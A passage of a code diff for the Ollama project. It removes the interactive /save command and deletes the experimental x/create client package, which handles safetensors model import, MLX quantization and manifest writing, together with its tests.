-					} else {
-						fmt.Printf("error loading model: %v\n", err)
-					}
-					continue
-				}
-			}
-
-			p.StopAndClear()
-			modelName = newModelName
-			messages = []api.Message{}
-			approval.Reset()
-			continue
-		case strings.HasPrefix(line, "/save"):
-			args := strings.Fields(line)
-			if len(args) != 2 {
-				fmt.Println("Usage: /save <modelname>")
-				continue
-			}
-			client, err := api.ClientFromEnvironment()
-			if err != nil {
-				fmt.Println("error: couldn't connect to ollama server")
-				continue
-			}
-			req := &api.CreateRequest{
-				Model:      args[1],
-				From:       modelName,
-				Parameters: options,
-				Messages:   messages,
-			}
-			fn := func(resp api.ProgressResponse) error { return nil }
-			err = client.Create(cmd.Context(), req, fn)
-			if err != nil {
-				fmt.Printf("error: %v\n", err)
-				continue
-			}
-			fmt.Printf("Created new model '%s'\n", args[1])
-			continue
 		case strings.HasPrefix(line, "/"):
 			fmt.Printf("Unknown command '%s'. Type /? for help\n", strings.Fields(line)[0])
 			continue
@@ -1028,12 +723,10 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
 			newMessage := api.Message{Role: "user", Content: sb.String()}
 			messages = append(messages, newMessage)

-			verbose, _ := cmd.Flags().GetBool("verbose")
 			opts := RunOptions{
 				Model:        modelName,
 				Messages:     messages,
 				WordWrap:     wordWrap,
-				Format:       format,
 				Options:      options,
 				Think:        think,
 				HideThinking: hideThinking,
@@ -1041,7 +734,6 @@ func GenerateInteractive(cmd *cobra.Command, modelName string, wordWrap bool, op
 				Tools:        toolRegistry,
 				Approval:     approval,
 				YoloMode:     yoloMode,
-				Verbose:      verbose,
 			}

 			assistant, err := Chat(cmd.Context(), opts)
--- a/x/create/client/create.go
+++ b/x/create/client/create.go
@@ -1,299 +0,0 @@
-// Package client provides client-side model creation for safetensors-based models.
-//
-// This package is in x/ because the safetensors model storage format is under development.
-// It also exists to break an import cycle: server imports x/create, so x/create
-// cannot import server. This sub-package can import server because server doesn't
-// import it.
-package client
-
-import (
-	"bytes"
-	"encoding/json"
-	"fmt"
-	"io"
-
-	"github.com/ollama/ollama/parser"
-	"github.com/ollama/ollama/progress"
-	"github.com/ollama/ollama/server"
-	"github.com/ollama/ollama/types/model"
-	"github.com/ollama/ollama/x/create"
-)
-
-// MinOllamaVersion is the minimum Ollama version required for safetensors models.
-const MinOllamaVersion = "0.14.0"
-
-// ModelfileConfig holds configuration extracted from a Modelfile.
-type ModelfileConfig struct {
-	Template string
-	System   string
-	License  string
-}
-
-// CreateOptions holds all options for model creation.
-type CreateOptions struct {
-	ModelName string
-	ModelDir  string
-	Quantize  string           // "fp8" for quantization
-	Modelfile *ModelfileConfig // template/system/license from Modelfile
-}
-
-// CreateModel imports a model from a local directory.
-// This creates blobs and manifest directly on disk, bypassing the HTTP API.
-// Automatically detects model type (safetensors LLM vs image gen) and routes accordingly.
-func CreateModel(opts CreateOptions, p *progress.Progress) error {
-	// Detect model type
-	isSafetensors := create.IsSafetensorsModelDir(opts.ModelDir)
-	isImageGen := create.IsTensorModelDir(opts.ModelDir)
-
-	if !isSafetensors && !isImageGen {
-		return fmt.Errorf("%s is not a supported model directory (needs config.json + *.safetensors or model_index.json)", opts.ModelDir)
-	}
-
-	// Determine model type settings
-	var modelType, spinnerKey string
-	var capabilities []string
-	if isSafetensors {
-		modelType = "safetensors model"
-		spinnerKey = "create"
-		capabilities = []string{"completion"}
-	} else {
-		modelType = "image generation model"
-		spinnerKey = "imagegen"
-		capabilities = []string{"image"}
-	}
-
-	// Set up progress spinner
-	statusMsg := "importing " + modelType
-	spinner := progress.NewSpinner(statusMsg)
-	p.Add(spinnerKey, spinner)
-
-	progressFn := func(msg string) {
-		spinner.Stop()
-		statusMsg = msg
-		spinner = progress.NewSpinner(statusMsg)
-		p.Add(spinnerKey, spinner)
-	}
-
-	// Create the model using shared callbacks
-	var err error
-	if isSafetensors {
-		err = create.CreateSafetensorsModel(
-			opts.ModelName, opts.ModelDir, opts.Quantize,
-			newLayerCreator(), newTensorLayerCreator(),
-			newManifestWriter(opts, capabilities),
-			progressFn,
-		)
-	} else {
-		err = create.CreateImageGenModel(
-			opts.ModelName, opts.ModelDir, opts.Quantize,
-			newLayerCreator(), newTensorLayerCreator(),
-			newManifestWriter(opts, capabilities),
-			progressFn,
-		)
-	}
-
-	spinner.Stop()
-	if err != nil {
-		return err
-	}
-
-	fmt.Printf("Created %s '%s'\n", modelType, opts.ModelName)
-	return nil
-}
-
-// newLayerCreator returns a LayerCreator callback for creating config/JSON layers.
-func newLayerCreator() create.LayerCreator {
-	return func(r io.Reader, mediaType, name string) (create.LayerInfo, error) {
-		layer, err := server.NewLayer(r, mediaType)
-		if err != nil {
-			return create.LayerInfo{}, err
-		}
-
-		return create.LayerInfo{
-			Digest:    layer.Digest,
-			Size:      layer.Size,
-			MediaType: layer.MediaType,
-			Name:      name,
-		}, nil
-	}
-}
-
-// newTensorLayerCreator returns a QuantizingTensorLayerCreator callback for creating tensor layers.
-// When quantize is non-empty, returns multiple layers (weight + scales + optional qbias).
-func newTensorLayerCreator() create.QuantizingTensorLayerCreator {
-	return func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]create.LayerInfo, error) {
-		if quantize != "" {
-			return createQuantizedLayers(r, name, dtype, shape, quantize)
-		}
-		return createUnquantizedLayer(r, name)
-	}
-}
-
-// createQuantizedLayers quantizes a tensor and returns the resulting layers.
-func createQuantizedLayers(r io.Reader, name, dtype string, shape []int32, quantize string) ([]create.LayerInfo, error) {
-	if !QuantizeSupported() {
-		return nil, fmt.Errorf("quantization requires MLX support")
-	}
-
-	// Quantize the tensor
-	qweightData, scalesData, qbiasData, _, _, _, err := quantizeTensor(r, name, dtype, shape, quantize)
-	if err != nil {
-		return nil, fmt.Errorf("failed to quantize %s: %w", name, err)
-	}
-
-	// Create layer for quantized weight
-	weightLayer, err := server.NewLayer(bytes.NewReader(qweightData), server.MediaTypeImageTensor)
-	if err != nil {
-		return nil, err
-	}
-
-	// Create layer for scales
-	scalesLayer, err := server.NewLayer(bytes.NewReader(scalesData), server.MediaTypeImageTensor)
-	if err != nil {
-		return nil, err
-	}
-
-	layers := []create.LayerInfo{
-		{
-			Digest:    weightLayer.Digest,
-			Size:      weightLayer.Size,
-			MediaType: weightLayer.MediaType,
-			Name:      name,
-		},
-		{
-			Digest:    scalesLayer.Digest,
-			Size:      scalesLayer.Size,
-			MediaType: scalesLayer.MediaType,
-			Name:      name + "_scale",
-		},
-	}
-
-	// Add qbiases layer if present (affine mode)
-	if qbiasData != nil {
-		qbiasLayer, err := server.NewLayer(bytes.NewReader(qbiasData), server.MediaTypeImageTensor)
-		if err != nil {
-			return nil, err
-		}
-		layers = append(layers, create.LayerInfo{
-			Digest:    qbiasLayer.Digest,
-			Size:      qbiasLayer.Size,
-			MediaType: qbiasLayer.MediaType,
-			Name:      name + "_qbias",
-		})
-	}
-
-	return layers, nil
-}
-
-// createUnquantizedLayer creates a single tensor layer without quantization.
-func createUnquantizedLayer(r io.Reader, name string) ([]create.LayerInfo, error) {
-	layer, err := server.NewLayer(r, server.MediaTypeImageTensor)
-	if err != nil {
-		return nil, err
-	}
-
-	return []create.LayerInfo{
-		{
-			Digest:    layer.Digest,
-			Size:      layer.Size,
-			MediaType: layer.MediaType,
-			Name:      name,
-		},
-	}, nil
-}
-
-// newManifestWriter returns a ManifestWriter callback for writing the model manifest.
-func newManifestWriter(opts CreateOptions, capabilities []string) create.ManifestWriter {
-	return func(modelName string, config create.LayerInfo, layers []create.LayerInfo) error {
-		name := model.ParseName(modelName)
-		if !name.IsValid() {
-			return fmt.Errorf("invalid model name: %s", modelName)
-		}
-
-		// Create config blob with version requirement
-		configData := model.ConfigV2{
-			ModelFormat:  "safetensors",
-			Capabilities: capabilities,
-			Requires:     MinOllamaVersion,
-		}
-		configJSON, err := json.Marshal(configData)
-		if err != nil {
-			return fmt.Errorf("failed to marshal config: %w", err)
-		}
-
-		// Create config layer blob
-		configLayer, err := server.NewLayer(bytes.NewReader(configJSON), "application/vnd.docker.container.image.v1+json")
-		if err != nil {
-			return fmt.Errorf("failed to create config layer: %w", err)
-		}
-
-		// Convert LayerInfo to server.Layer
-		serverLayers := make([]server.Layer, 0, len(layers))
-		for _, l := range layers {
-			serverLayers = append(serverLayers, server.Layer{
-				MediaType: l.MediaType,
-				Digest:    l.Digest,
-				Size:      l.Size,
-				Name:      l.Name,
-			})
-		}
-
-		// Add Modelfile layers if present
-		if opts.Modelfile != nil {
-			modelfileLayers, err := createModelfileLayers(opts.Modelfile)
-			if err != nil {
-				return err
-			}
-			serverLayers = append(serverLayers, modelfileLayers...)
-		}
-
-		return server.WriteManifest(name, configLayer, serverLayers)
-	}
-}
-
-// createModelfileLayers creates layers for template, system, and license from Modelfile config.
-func createModelfileLayers(mf *ModelfileConfig) ([]server.Layer, error) {
-	var layers []server.Layer
-
-	if mf.Template != "" {
-		layer, err := server.NewLayer(bytes.NewReader([]byte(mf.Template)), "application/vnd.ollama.image.template")
-		if err != nil {
-			return nil, fmt.Errorf("failed to create template layer: %w", err)
-		}
-		layers = append(layers, layer)
-	}
-
-	if mf.System != "" {
-		layer, err := server.NewLayer(bytes.NewReader([]byte(mf.System)), "application/vnd.ollama.image.system")
-		if err != nil {
-			return nil, fmt.Errorf("failed to create system layer: %w", err)
-		}
-		layers = append(layers, layer)
-	}
-
-	if mf.License != "" {
-		layer, err := server.NewLayer(bytes.NewReader([]byte(mf.License)), "application/vnd.ollama.image.license")
-		if err != nil {
-			return nil, fmt.Errorf("failed to create license layer: %w", err)
-		}
-		layers = append(layers, layer)
-	}
-
-	return layers, nil
-}
-
-// ExtractModelfileConfig extracts template, system, and license from a parsed Modelfile.
-func ExtractModelfileConfig(modelfile *parser.Modelfile) *ModelfileConfig {
-	mfConfig := &ModelfileConfig{}
-	for _, cmd := range modelfile.Commands {
-		switch cmd.Name {
-		case "template":
-			mfConfig.Template = cmd.Args
-		case "system":
-			mfConfig.System = cmd.Args
-		case "license":
-			mfConfig.License = cmd.Args
-		}
-	}
-	return mfConfig
-}
--- a/x/create/client/create_test.go
+++ b/x/create/client/create_test.go
@@ -1,146 +0,0 @@
-package client
-
-import (
-	"testing"
-)
-
-func TestModelfileConfig(t *testing.T) {
-	// Test that ModelfileConfig struct works as expected
-	config := &ModelfileConfig{
-		Template: "{{ .Prompt }}",
-		System:   "You are a helpful assistant.",
-		License:  "MIT",
-	}
-
-	if config.Template != "{{ .Prompt }}" {
-		t.Errorf("Template = %q, want %q", config.Template, "{{ .Prompt }}")
-	}
-	if config.System != "You are a helpful assistant." {
-		t.Errorf("System = %q, want %q", config.System, "You are a helpful assistant.")
-	}
-	if config.License != "MIT" {
-		t.Errorf("License = %q, want %q", config.License, "MIT")
-	}
-}
-
-func TestModelfileConfig_Empty(t *testing.T) {
-	config := &ModelfileConfig{}
-
-	if config.Template != "" {
-		t.Errorf("Template should be empty, got %q", config.Template)
-	}
-	if config.System != "" {
-		t.Errorf("System should be empty, got %q", config.System)
-	}
-	if config.License != "" {
-		t.Errorf("License should be empty, got %q", config.License)
-	}
-}
-
-func TestModelfileConfig_PartialFields(t *testing.T) {
-	// Test config with only some fields set
-	config := &ModelfileConfig{
-		Template: "{{ .Prompt }}",
-		// System and License intentionally empty
-	}
-
-	if config.Template == "" {
-		t.Error("Template should not be empty")
-	}
-	if config.System != "" {
-		t.Error("System should be empty")
-	}
-	if config.License != "" {
-		t.Error("License should be empty")
-	}
-}
-
-func TestMinOllamaVersion(t *testing.T) {
-	// Verify the minimum version constant is set
-	if MinOllamaVersion == "" {
-		t.Error("MinOllamaVersion should not be empty")
-	}
-	if MinOllamaVersion != "0.14.0" {
-		t.Errorf("MinOllamaVersion = %q, want %q", MinOllamaVersion, "0.14.0")
-	}
-}
-
-func TestCreateModel_InvalidDir(t *testing.T) {
-	// Test that CreateModel returns error for invalid directory
-	err := CreateModel(CreateOptions{
-		ModelName: "test-model",
-		ModelDir:  "/nonexistent/path",
-	}, nil)
-	if err == nil {
-		t.Error("expected error for nonexistent directory, got nil")
-	}
-}
-
-func TestCreateModel_NotSafetensorsDir(t *testing.T) {
-	// Test that CreateModel returns error for directory without safetensors
-	dir := t.TempDir()
-
-	err := CreateModel(CreateOptions{
-		ModelName: "test-model",
-		ModelDir:  dir,
-	}, nil)
-	if err == nil {
-		t.Error("expected error for empty directory, got nil")
-	}
-}
-
-func TestCreateOptions(t *testing.T) {
-	opts := CreateOptions{
-		ModelName: "my-model",
-		ModelDir:  "/path/to/model",
-		Quantize:  "fp8",
-		Modelfile: &ModelfileConfig{
-			Template: "test",
-			System:   "system",
-			License:  "MIT",
-		},
-	}
-
-	if opts.ModelName != "my-model" {
-		t.Errorf("ModelName = %q, want %q", opts.ModelName, "my-model")
-	}
-	if opts.ModelDir != "/path/to/model" {
-		t.Errorf("ModelDir = %q, want %q", opts.ModelDir, "/path/to/model")
-	}
-	if opts.Quantize != "fp8" {
-		t.Errorf("Quantize = %q, want %q", opts.Quantize, "fp8")
-	}
-	if opts.Modelfile == nil {
-		t.Error("Modelfile should not be nil")
-	}
-	if opts.Modelfile.Template != "test" {
-		t.Errorf("Modelfile.Template = %q, want %q", opts.Modelfile.Template, "test")
-	}
-}
-
-func TestCreateOptions_Defaults(t *testing.T) {
-	opts := CreateOptions{
-		ModelName: "test",
-		ModelDir:  "/tmp",
-	}
-
-	// Quantize should default to empty
-	if opts.Quantize != "" {
-		t.Errorf("Quantize should be empty by default, got %q", opts.Quantize)
-	}
-
-	// Modelfile should default to nil
-	if opts.Modelfile != nil {
-		t.Error("Modelfile should be nil by default")
-	}
-}
-
-func TestQuantizeSupported(t *testing.T) {
-	// This just verifies the function exists and returns a boolean
-	// The actual value depends on build tags (mlx vs non-mlx)
-	supported := QuantizeSupported()
-
-	// In non-mlx builds, this should be false
-	// We can't easily test both cases, so just verify it returns something
-	_ = supported
-}
--- a/x/create/client/quantize.go
+++ b/x/create/client/quantize.go
@@ -1,130 +0,0 @@
-//go:build mlx
-
-package client
-
-import (
-	"fmt"
-	"io"
-	"os"
-	"path/filepath"
-
-	"github.com/ollama/ollama/x/imagegen/mlx"
-)
-
-// quantizeTensor loads a tensor from safetensors format, quantizes it,
-// and returns safetensors data for the quantized weights, scales, and biases.
-// Supported quantization types: "fp8" (affine 8-bit)
-// Uses MLX's native SaveSafetensors to ensure correct dtype handling (especially uint32 for quantized weights).
-func quantizeTensor(r io.Reader, name, dtype string, shape []int32, quantize string) (qweightData, scalesData, qbiasData []byte, qweightShape, scalesShape, qbiasShape []int32, err error) {
-	tmpDir := ensureTempDir()
-
-	// Read safetensors data to a temp file (LoadSafetensorsNative needs a path)
-	tmpFile, err := os.CreateTemp(tmpDir, "quant-input-*.safetensors")
-	if err != nil {
-		return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to create temp file: %w", err)
-	}
-	tmpPath := tmpFile.Name()
-	defer os.Remove(tmpPath)
-
-	if _, err := io.Copy(tmpFile, r); err != nil {
-		tmpFile.Close()
-		return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to write temp file: %w", err)
-	}
-	tmpFile.Close()
-
-	// Load the tensor using MLX's native loader
-	st, err := mlx.LoadSafetensorsNative(tmpPath)
-	if err != nil {
-		return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to load safetensors: %w", err)
-	}
-	defer st.Free()
-
-	// Get the tensor (it's stored as "data" in our minimal safetensors format)
-	arr := st.Get("data")
-	if arr == nil {
-		return nil, nil, nil, nil, nil, nil, fmt.Errorf("tensor 'data' not found in safetensors")
-	}
-
-	// Convert to BFloat16 if needed (quantize expects float type)
-	if arr.Dtype() != mlx.DtypeBFloat16 && arr.Dtype() != mlx.DtypeFloat32 && arr.Dtype() != mlx.DtypeFloat16 {
-		arr = mlx.AsType(arr, mlx.DtypeBFloat16)
-		mlx.Eval(arr)
-	}
-
-	// Quantize based on quantization type
-	var qweight, scales, qbiases *mlx.Array
-	switch quantize {
-	case "fp4":
-		// affine mode: group_size=32, bits=4
-		qweight, scales, qbiases = mlx.Quantize(arr, 32, 4, "affine")
-	case "fp8":
-		// affine mode: group_size=32, bits=8
-		qweight, scales, qbiases = mlx.Quantize(arr, 32, 8, "affine")
-	default:
-		return nil, nil, nil, nil, nil, nil, fmt.Errorf("unsupported quantization type: %s", quantize)
-	}
-
-	// Eval and make contiguous for data access
-	qweight = mlx.Contiguous(qweight)
-	scales = mlx.Contiguous(scales)
-	if qbiases != nil {
-		qbiases = mlx.Contiguous(qbiases)
-		mlx.Eval(qweight, scales, qbiases)
-	} else {
-		mlx.Eval(qweight, scales)
-	}
-
-	// Get shapes
-	qweightShape = qweight.Shape()
-	scalesShape = scales.Shape()
-
-	// Save quantized weight using MLX's native safetensors (correctly handles uint32 dtype)
-	qweightPath := filepath.Join(tmpDir, "qweight.safetensors")
-	defer os.Remove(qweightPath)
-	if err := mlx.SaveSafetensors(qweightPath, map[string]*mlx.Array{"data": qweight}); err != nil {
-		return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to save quantized weight: %w", err)
-	}
-	qweightData, err = os.ReadFile(qweightPath)
-	if err != nil {
-		return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to read quantized weight: %w", err)
-	}
-
-	// Save scales using MLX's native safetensors
-	scalesPath := filepath.Join(tmpDir, "scales.safetensors")
-	defer os.Remove(scalesPath)
-	if err := mlx.SaveSafetensors(scalesPath, map[string]*mlx.Array{"data": scales}); err != nil {
-		return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to save scales: %w", err)
-	}
-	scalesData, err = os.ReadFile(scalesPath)
-	if err != nil {
-		return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to read scales: %w", err)
-	}
-
-	// Affine mode returns qbiases for zero-point offset
-	if qbiases != nil {
-		qbiasShape = qbiases.Shape()
-		qbiasPath := filepath.Join(tmpDir, "qbias.safetensors")
-		defer os.Remove(qbiasPath)
-		if err := mlx.SaveSafetensors(qbiasPath, map[string]*mlx.Array{"data": qbiases}); err != nil {
-			return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to save qbiases: %w", err)
-		}
-		qbiasData, err = os.ReadFile(qbiasPath)
-		if err != nil {
-			return nil, nil, nil, nil, nil, nil, fmt.Errorf("failed to read qbiases: %w", err)
-		}
-	}
-
-	return qweightData, scalesData, qbiasData, qweightShape, scalesShape, qbiasShape, nil
-}
-
-// QuantizeSupported returns true if quantization is supported (MLX build)
-func QuantizeSupported() bool {
-	return true
-}
-
-// ensureTempDir creates the temp directory for quantization if it doesn't exist
-func ensureTempDir() string {
-	tmpDir := filepath.Join(os.TempDir(), "ollama-quantize")
-	os.MkdirAll(tmpDir, 0755)
-	return tmpDir
-}
--- a/x/create/client/quantize_stub.go
+++ b/x/create/client/quantize_stub.go
@@ -1,18 +0,0 @@
-//go:build !mlx
-
-package client
-
-import (
-	"fmt"
-	"io"
-)
-
-// quantizeTensor is not available without MLX
-func quantizeTensor(r io.Reader, name, dtype string, shape []int32, quantize string) (qweightData, scalesData, qbiasData []byte, qweightShape, scalesShape, qbiasShape []int32, err error) {
-	return nil, nil, nil, nil, nil, nil, fmt.Errorf("quantization requires MLX support (build with mlx tag)")
-}
-
-// QuantizeSupported returns false when MLX is not available
-func QuantizeSupported() bool {
-	return false
-}
--- a/x/create/create.go
+++ b/x/create/create.go
@@ -1,399 +0,0 @@
-package create
-
-import (
-	"encoding/json"
-	"fmt"
-	"io"
-	"os"
-	"path/filepath"
-	"slices"
-	"strings"
-
-	"github.com/ollama/ollama/envconfig"
-	"github.com/ollama/ollama/x/imagegen/safetensors"
-)
-
-// ModelConfig represents the config blob stored with a model.
-type ModelConfig struct {
-	ModelFormat  string   `json:"model_format"`
-	Capabilities []string `json:"capabilities"`
-}
-
-// Manifest represents the manifest JSON structure.
-type Manifest struct {
-	SchemaVersion int             `json:"schemaVersion"`
-	MediaType     string          `json:"mediaType"`
-	Config        ManifestLayer   `json:"config"`
-	Layers        []ManifestLayer `json:"layers"`
-}
-
-// ManifestLayer represents a layer in the manifest.
-type ManifestLayer struct {
-	MediaType string `json:"mediaType"`
-	Digest    string `json:"digest"`
-	Size      int64  `json:"size"`
-	Name      string `json:"name,omitempty"`
-}
-
-// defaultManifestDir returns the manifest storage directory.
-func defaultManifestDir() string {
-	return filepath.Join(envconfig.Models(), "manifests")
-}
-
-// defaultBlobDir returns the blob storage directory.
-func defaultBlobDir() string {
-	return filepath.Join(envconfig.Models(), "blobs")
-}
-
-// resolveManifestPath converts a model name to a manifest file path.
-func resolveManifestPath(modelName string) string {
-	host := "registry.ollama.ai"
-	namespace := "library"
-	name := modelName
-	tag := "latest"
-
-	if idx := strings.LastIndex(name, ":"); idx != -1 {
-		tag = name[idx+1:]
-		name = name[:idx]
-	}
-
-	parts := strings.Split(name, "/")
-	switch len(parts) {
-	case 3:
-		host = parts[0]
-		namespace = parts[1]
-		name = parts[2]
-	case 2:
-		namespace = parts[0]
-		name = parts[1]
-	}
-
-	return filepath.Join(defaultManifestDir(), host, namespace, name, tag)
-}
-
-// loadManifest loads a manifest for the given model name.
-func loadManifest(modelName string) (*Manifest, error) {
-	manifestPath := resolveManifestPath(modelName)
-
-	data, err := os.ReadFile(manifestPath)
-	if err != nil {
-		return nil, err
-	}
-
-	var manifest Manifest
-	if err := json.Unmarshal(data, &manifest); err != nil {
-		return nil, err
-	}
-
-	return &manifest, nil
-}
-
-// loadModelConfig loads the config blob for a model.
-func loadModelConfig(modelName string) (*ModelConfig, error) {
-	manifest, err := loadManifest(modelName)
-	if err != nil {
-		return nil, err
-	}
-
-	// Read the config blob
-	blobName := strings.Replace(manifest.Config.Digest, ":", "-", 1)
-	blobPath := filepath.Join(defaultBlobDir(), blobName)
-
-	data, err := os.ReadFile(blobPath)
-	if err != nil {
-		return nil, err
-	}
-
-	var config ModelConfig
-	if err := json.Unmarshal(data, &config); err != nil {
-		return nil, err
-	}
-
-	return &config, nil
-}
-
-// IsSafetensorsModel checks if a model was created with the experimental
-// safetensors builder by checking the model format in the config.
-func IsSafetensorsModel(modelName string) bool {
-	config, err := loadModelConfig(modelName)
-	if err != nil {
-		return false
-	}
-	return config.ModelFormat == "safetensors"
-}
-
-// IsSafetensorsLLMModel checks if a model is a safetensors LLM model
-// (has completion capability, not image generation).
-func IsSafetensorsLLMModel(modelName string) bool {
-	config, err := loadModelConfig(modelName)
-	if err != nil {
-		return false
-	}
-	return config.ModelFormat == "safetensors" && slices.Contains(config.Capabilities, "completion")
-}
-
-// IsImageGenModel checks if a model is an image generation model
-// (has image capability).
-func IsImageGenModel(modelName string) bool {
-	config, err := loadModelConfig(modelName)
-	if err != nil {
-		return false
-	}
-	return config.ModelFormat == "safetensors" && slices.Contains(config.Capabilities, "image")
-}
-
-// GetModelArchitecture returns the architecture from the model's config.json layer.
-func GetModelArchitecture(modelName string) (string, error) {
-	manifest, err := loadManifest(modelName)
-	if err != nil {
-		return "", err
-	}
-
-	// Find the config.json layer
-	for _, layer := range manifest.Layers {
-		if layer.Name == "config.json" && layer.MediaType == "application/vnd.ollama.image.json" {
-			blobName := strings.Replace(layer.Digest, ":", "-", 1)
-			blobPath := filepath.Join(defaultBlobDir(), blobName)
-
-			data, err := os.ReadFile(blobPath)
-			if err != nil {
-				return "", err
-			}
-
-			var cfg struct {
-				Architectures []string `json:"architectures"`
-				ModelType     string   `json:"model_type"`
-			}
-			if err := json.Unmarshal(data, &cfg); err != nil {
-				return "", err
-			}
-
-			// Prefer model_type, fall back to first architecture
-			if cfg.ModelType != "" {
-				return cfg.ModelType, nil
-			}
-			if len(cfg.Architectures) > 0 {
-				return cfg.Architectures[0], nil
-			}
-		}
-	}
-
-	return "", fmt.Errorf("architecture not found in model config")
-}
-
-// IsTensorModelDir checks if the directory contains a diffusers-style tensor model
-// by looking for model_index.json, which is the standard diffusers pipeline config.
-func IsTensorModelDir(dir string) bool {
-	_, err := os.Stat(filepath.Join(dir, "model_index.json"))
-	return err == nil
-}
-
-// IsSafetensorsModelDir checks if the directory contains a standard safetensors model
-// by looking for config.json and at least one .safetensors file.
-func IsSafetensorsModelDir(dir string) bool {
-	// Must have config.json
-	if _, err := os.Stat(filepath.Join(dir, "config.json")); err != nil {
-		return false
-	}
-
-	// Must have at least one .safetensors file
-	entries, err := os.ReadDir(dir)
-	if err != nil {
-		return false
-	}
-
-	for _, entry := range entries {
-		if strings.HasSuffix(entry.Name(), ".safetensors") {
-			return true
-		}
-	}
-
-	return false
-}
-
-// LayerInfo holds metadata for a created layer.
-type LayerInfo struct {
-	Digest    string
-	Size      int64
-	MediaType string
-	Name      string // Path-style name: "component/tensor" or "path/to/config.json"
-}
-
-// LayerCreator is called to create a blob layer.
-// name is the path-style name (e.g., "tokenizer/tokenizer.json")
-type LayerCreator func(r io.Reader, mediaType, name string) (LayerInfo, error)
-
-// TensorLayerCreator creates a tensor blob layer with metadata.
-// name is the path-style name including component (e.g., "text_encoder/model.embed_tokens.weight")
-type TensorLayerCreator func(r io.Reader, name, dtype string, shape []int32) (LayerInfo, error)
-
-// QuantizingTensorLayerCreator creates tensor layers with optional quantization.
-// When quantize is non-empty (e.g., "fp8"), returns multiple layers (weight + scales + biases).
-type QuantizingTensorLayerCreator func(r io.Reader, name, dtype string, shape []int32, quantize string) ([]LayerInfo, error)
-
-// ManifestWriter writes the manifest file.
-type ManifestWriter func(modelName string, config LayerInfo, layers []LayerInfo) error
-
-// ShouldQuantize returns true if a tensor should be quantized.
-// For image gen models (component non-empty): quantizes linear weights, skipping VAE, embeddings, norms.
-// For LLM models (component empty): quantizes linear weights, skipping embeddings, norms, and small tensors.
-func ShouldQuantize(name, component string) bool {
-	// Image gen specific: skip VAE entirely
-	if component == "vae" {
-		return false
-	}
-
-	// Skip embeddings
-	if strings.Contains(name, "embed") {
-		return false
-	}
-
-	// Skip layer norms and RMS norms
-	if strings.Contains(name, "norm") || strings.Contains(name, "ln_") || strings.Contains(name, "layernorm") {
-		return false
-	}
-
-	// Skip biases
-	if strings.HasSuffix(name, ".bias") {
-		return false
-	}
-
-	// Only quantize weights
-	return strings.HasSuffix(name, ".weight")
-}
-
-// ShouldQuantizeTensor returns true if a tensor should be quantized based on name and shape.
-// This is a more detailed check that also considers tensor dimensions.
-func ShouldQuantizeTensor(name string, shape []int32) bool {
-	// Use basic name-based check first
-	if !ShouldQuantize(name, "") {
-		return false
-	}
-
-	// Only quantize 2D tensors (linear layers) - skip 1D (biases, norms) and higher-D (convolutions if any)
-	if len(shape) != 2 {
-		return false
-	}
-
-	// Skip small tensors (less than 1024 elements) - not worth quantizing
-	if len(shape) >= 2 && int64(shape[0])*int64(shape[1]) < 1024 {
-		return false
-	}
-
-	// MLX quantization requires last dimension to be divisible by group size (32)
-	if shape[len(shape)-1]%32 != 0 {
-		return false
-	}
-
-	return true
-}
-
-// CreateSafetensorsModel imports a standard safetensors model from a directory.
-// This handles Hugging Face style models with config.json and *.safetensors files.
-// Stores each tensor as a separate blob for fine-grained deduplication.
-// If quantize is non-empty (e.g., "fp8"), eligible tensors will be quantized.
-func CreateSafetensorsModel(modelName, modelDir, quantize string, createLayer LayerCreator, createTensorLayer QuantizingTensorLayerCreator, writeManifest ManifestWriter, fn func(status string)) error {
-	var layers []LayerInfo
-	var configLayer LayerInfo
-
-	entries, err := os.ReadDir(modelDir)
-	if err != nil {
-		return fmt.Errorf("failed to read directory: %w", err)
-	}
-
-	// Process all safetensors files
-	for _, entry := range entries {
-		if entry.IsDir() || !strings.HasSuffix(entry.Name(), ".safetensors") {
-			continue
-		}
-
-		stPath := filepath.Join(modelDir, entry.Name())
-
-		// Extract individual tensors from safetensors file
-		extractor, err := safetensors.OpenForExtraction(stPath)
-		if err != nil {
-			return fmt.Errorf("failed to open %s: %w", stPath, err)
-		}
-
-		tensorNames := extractor.ListTensors()
-		quantizeMsg := ""
-		if quantize != "" {
-			quantizeMsg = fmt.Sprintf(", quantizing to %s", quantize)
-		}
-		fn(fmt.Sprintf("importing %s (%d tensors%s)", entry.Name(), len(tensorNames), quantizeMsg))
-
-		for _, tensorName := range tensorNames {
-			td, err := extractor.GetTensor(tensorName)
-			if err != nil {
-				extractor.Close()
-				return fmt.Errorf("failed to get tensor %s: %w", tensorName, err)
-			}
-
-			// Determine quantization type for this tensor (empty string if not quantizing)
-			quantizeType := ""
-			if quantize != "" && ShouldQuantizeTensor(tensorName, td.Shape) {
-				quantizeType = quantize
-			}
-
-			// Store as minimal safetensors format (88 bytes header overhead)
-			// This enables native mmap loading via mlx_load_safetensors
-			// createTensorLayer returns multiple layers if quantizing (weight + scales)
-			newLayers, err := createTensorLayer(td.SafetensorsReader(), tensorName, td.Dtype, td.Shape, quantizeType)
-			if err != nil {
-				extractor.Close()
-				return fmt.Errorf("failed to create layer for %s: %w", tensorName, err)
-			}
-			layers = append(layers, newLayers...)
-		}
-
-		extractor.Close()
-	}
-
-	// Process all JSON config files
-	for _, entry := range entries {
-		if entry.IsDir() || !strings.HasSuffix(entry.Name(), ".json") {
-			continue
-		}
-
-		// Skip the index file as we don't need it after extraction
-		if entry.Name() == "model.safetensors.index.json" {
-			continue
-		}
-
-		cfgPath := entry.Name()
-		fullPath := filepath.Join(modelDir, cfgPath)
-
-		fn(fmt.Sprintf("importing config %s", cfgPath))
-
-		f, err := os.Open(fullPath)
-		if err != nil {
-			return fmt.Errorf("failed to open %s: %w", cfgPath, err)
-		}
-
-		layer, err := createLayer(f, "application/vnd.ollama.image.json", cfgPath)
-		f.Close()
-		if err != nil {
-			return fmt.Errorf("failed to create layer for %s: %w", cfgPath, err)
-		}
-
-		// Use config.json as the config layer
-		if cfgPath == "config.json" {
-			configLayer = layer
-		}
-
-		layers = append(layers, layer)
-	}
-
